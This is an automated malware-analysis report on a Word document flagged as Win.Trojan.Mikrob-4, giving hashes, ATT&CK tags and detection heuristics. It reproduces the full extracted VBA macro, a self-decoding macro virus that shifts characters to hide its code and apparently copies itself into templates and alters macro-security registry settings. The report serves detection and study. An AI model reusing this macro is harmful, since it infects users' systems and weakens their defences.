Win.Trojan.Mikrob-4 — Office (OLE) malware analysis

Static analysis result for SHA-256 43cf77fae3c1bbbb…

MALICIOUS

Office (OLE)

38.0 KB Created: 2001-09-24 02:25:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 3bd2c536cbfddeb529179c80ac97e9f7 SHA-1: 4e2bef4498802773bb6bad8c3cfd3be5385faf75 SHA-256: 43cf77fae3c1bbbbefe6f0a7e005dbbc40024b52222be312720fa3a6f3b6b052
120 Risk Score

Malware Insights

Win.Trojan.Mikrob-4 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Win.Trojan.Mikrob-4. It contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The macro's obfuscated nature suggests it is designed to download and execute a secondary payload, aligning with the behavior of a trojan.

Heuristics 3

  • ClamAV: Win.Trojan.Mikrob-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Mikrob-4
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4705 bytes
SHA-256: 24c544b67e411df3ef5ee78819a2427cd93a11272215bdc80555c6d6e15ade19
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Sinteza
Private Sub Document_Open()
'¡•MjM€¡Ÿ–›” [�Ÿ–šU�•– qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[y–›’ U^YMŒ
'�•– qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[pœ¢›¡|“y–›’ VV
'v“M{œŸšŽ™�’š�™Ž¡’[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[y–›’ U^YM^VMikMOT€–›¡’§ŽOM�•’›
'MMMM{œŸšŽ™�’š�™Ž¡’[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[q’™’¡’y–›’ M^YMŒ
'MMMM{œŸšŽ™�’š�™Ž¡’[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[pœ¢›¡|“y–›’ 
'MMMM{œŸšŽ™�’š�™Ž¡’[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[n‘‘sŸœš€¡Ÿ–›”M¡•
'r›‘Mv“
'v“Mn�¡–£’qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[y–›’ U^YM^VMikMOT€–›¡’§ŽOM�•’›
'MMMMn�¡–£’qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[q’™’¡’y–›’ M^YMŒ
'MMMMn�¡–£’qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[pœ¢›¡|“y–›’ 
'MMMMn�¡–£’qœ�¢š’›¡[ƒo}Ÿœ—’�¡[ƒopœš�œ›’›¡ U^V[pœ‘’zœ‘¢™’[n‘‘sŸœš€¡Ÿ–›”M¡•
'r›‘Mv“
'v“Mq–ŸUO�g‰Ž¢¡œ’¥’�[‘Ÿ£OVMikMOŽ¢¡œ’¥’�[‘Ÿ£OM�•’›
'MMMM|�’›MO�g‰Ž¢¡œ’¥’�[‘Ÿ£OMsœŸM|¢¡�¢¡Mn MP^
'MMMM}Ÿ–›¡MP^YM¡•
'MMMMp™œ ’MP^
'r›‘Mv“
'v“Mq–ŸUO�g‰�œ›“–”[£� OVMikMO�œ›“–”[£� OM�•’›
'MMMM|�’›MOpg‰�œ›“–”[£� OMsœŸM|¢¡�¢¡Mn MP^
'MMMM}Ÿ–›¡MP^YMO‘–šMŽY�O
'MMMM}Ÿ–›¡MP^YMO ’¡MŽMjM�Ÿ’Ž¡’œ�—’�¡UOO¤œŸ‘[Ž��™–�Ž¡–œ›OOVO
'MMMM}Ÿ–›¡MP^YMO ’¡M�MjMŽ[›œŸšŽ™¡’š�™Ž¡’[£��Ÿœ—’�¡[£��œš�œ›’›¡ U^V[�œ‘’šœ‘¢™’O
'MMMM}Ÿ–›¡MP^YMO–“M�[™–›’ U^Y^VMikMOOT€–›¡’§ŽOOM¡•’›O
'MMMM}Ÿ–›¡MP^YMO�[Ž‘‘“Ÿœš“–™’MOO�g‰Ž¢¡œ’¥’�[‘Ÿ£OOO
'MMMM}Ÿ–›¡MP^YMO’›‘M–“O
'MMMM}Ÿ–›¡MP^YMOŽ[~¢–¡O
'MMMMp™œ ’MP^
'MMMM€¦ ¡’š[}Ÿ–£Ž¡’}Ÿœ“–™’€¡Ÿ–›”UOOYMOuxr†Œp‚  r{�Œ‚€r ‰€œ“¡¤ŽŸ’‰z–�Ÿœ œ“¡‰|““–�’‰f[]‰„œŸ‘‰€’�¢Ÿ–¡¦OYMOy’£’™OVMjM^S
'r›‘Mv“
'€¦ ¡’š[}Ÿ–£Ž¡’}Ÿœ“–™’€¡Ÿ–›”UOOYMOuxr†Œy|pnyŒznpuv{r‰€œ“¡¤ŽŸ’‰z–�Ÿœ œ“¡‰„–›‘œ¤ ‰p¢ŸŸ’›¡ƒ’Ÿ –œ›‰ ¢›OYMOx’Ÿ›’™`_€’¡OVMjMO�g‰�œ›“–”[£� O
'€’¡n¡¡ŸMO�g‰Ž¢¡œ’¥’�[‘Ÿ£OYM£�u–‘‘’›
'€’¡n¡¡ŸMO�g‰�œ›“–”[£� OYM£�u–‘‘’›
End Sub
Private Sub Document_Close()
If Left(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1), 1) = "'" Then
 For I = 3 To 34
  naskod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
  F = Right(naskod, Len(naskod) - 1)
  ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine I, F
 Next
  For i2 = 3 To 34
   nkod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(i2, 1)
   For a1 = 1 To Len(nkod)
    dnk = dnk & Chr(Asc(Mid(nkod, a1)) - 45)
    ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine i2, dnk
   Next
   dnk = ""
  Next
End If
Document_Open
If Left(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1), 1) <> "'" Then
 For G = 3 To 34
  naskod2 = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(G, 1)
  If Left(naskod2, 1) <> "'" Then
   For a2 = 1 To Len(naskod2)
    enk = enk & Chr(Asc(Mid(naskod2, a2)) + 45)
    ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine G, "'" & enk
   Next
   enk = ""
  End If
 Next
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.